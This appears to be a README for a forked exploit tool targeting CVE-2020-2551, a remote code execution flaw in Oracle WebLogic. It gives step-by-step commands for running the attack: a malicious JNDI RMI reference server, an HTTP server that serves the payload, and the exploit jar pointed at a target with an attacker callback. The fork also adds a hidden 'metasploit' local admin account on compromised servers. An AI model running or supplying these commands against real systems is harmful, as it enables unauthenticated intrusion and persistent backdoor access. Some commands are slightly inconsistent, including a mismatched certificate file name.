Fork from https://github.com/Y4er/CVE-2020-2551 with some quality of life changes. See below for more details.
A remote code execution vulnerability was found in Oracle Weblogic Server. A remote, unauthenticated attacker could exploit this vulnerability and cause a remote IIOP server to initialize a Java object that invokes a JNDI lookup to a remote, attacker-controlled server. A malicious JNDI lookup will result in code execution.
- The original tool from https://github.com/Y4er/CVE-2020-2551 only support IIOP (7001/tcp). IIOPS (7002/tcp) was not implemented
- Support for Weblogic (x.x.x.x:7002 instead of just x.x.x.x:7001)
- Support for Weblogic servers that support TLS1.2 only
- Detect when IIOP protocol have been disabled on the Weblogic server
- Switch to SSL (IIOPS) when TCP port 7002 instead of 7001 (IIOP) has been selected
- Add metasploit|metasploit local admin account on Weblogic server on successful exploitation
- Oracle WebLogic 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 or 12.2.1.4.0 (fmw_12.1.3.0.0_wls.jar) from http://www.oracle.com/technetwork/middleware/weblogic/downloads/wls-for-dev-1703574.html
- JDK 1.6 (jdk-6u45-linux-x64.bin) from https://www.oracle.com/sg/java/technologies/javase-java-archive-javase6-downloads.html
- JDK 1.8 (jdk-8u281-linux-x64.tar.gz) from https://www.oracle.com/sg/java/technologies/javase/javase-jdk8-downloads.html
- marshalsec-0.0.3-SNAPSHOT-all.jar from https://github.com/RandomRobbieBF/marshalsec-jar/blob/master/marshalsec-0.0.3-SNAPSHOT-all.jar?raw=true
- Ant (apt-install ant)
# Copy jdk-6u45-linux-x64.bin and jdk-8u281-linux-x64.tar.gz to /tmp
$ apt-install ant
$ cd /tmp
$ wget https://github.com/RandomRobbieBF/marshalsec-jar/blob/master/marshalsec-0.0.3-SNAPSHOT-all.jar?raw=true -o marshalsec-0.0.3-SNAPSHOT-all.jar
$ tar xvfz jdk-8u281-linux-x64.tar.gz
$ ./jdk-6u45-linux-x64.bin
$ git clone http://peneuw2c-git01.fgxint.net:3000/klee/CVE-2020-2551
$ cd CVE-2020-2551
$ make
If you are targeting Weblogic server (x.x.x.x:7002) (iiops), run the below commands. Replace 172.16.164.2 with the correct IP address.
If you are targeting Weblogic server (x.x.x.x:7001) (iiop), skip this step
$ echo -n | openssl s_client -connect 172.16.164.2:7002 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ~/172.16.164.133.crt
$ keytool -import -v -trustcacerts -alias 172.16.164.2 -file ~/172.16.164.2.crt -keystore /tmp/jdk1.8.0_281/jre/lib/security/cacerts -keypass changeit -storepass changeit
$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://172.16.164.1/#exp" 1099
$ cd src && python3 -m http.server --bind 0.0.0.0 80
$ java -jar /tmp/CVE-2020-2551/build/jar/weblogic_CVE_2020_2551.jar 172.16.164.2 7001 rmi://172.16.164.1:1099/exp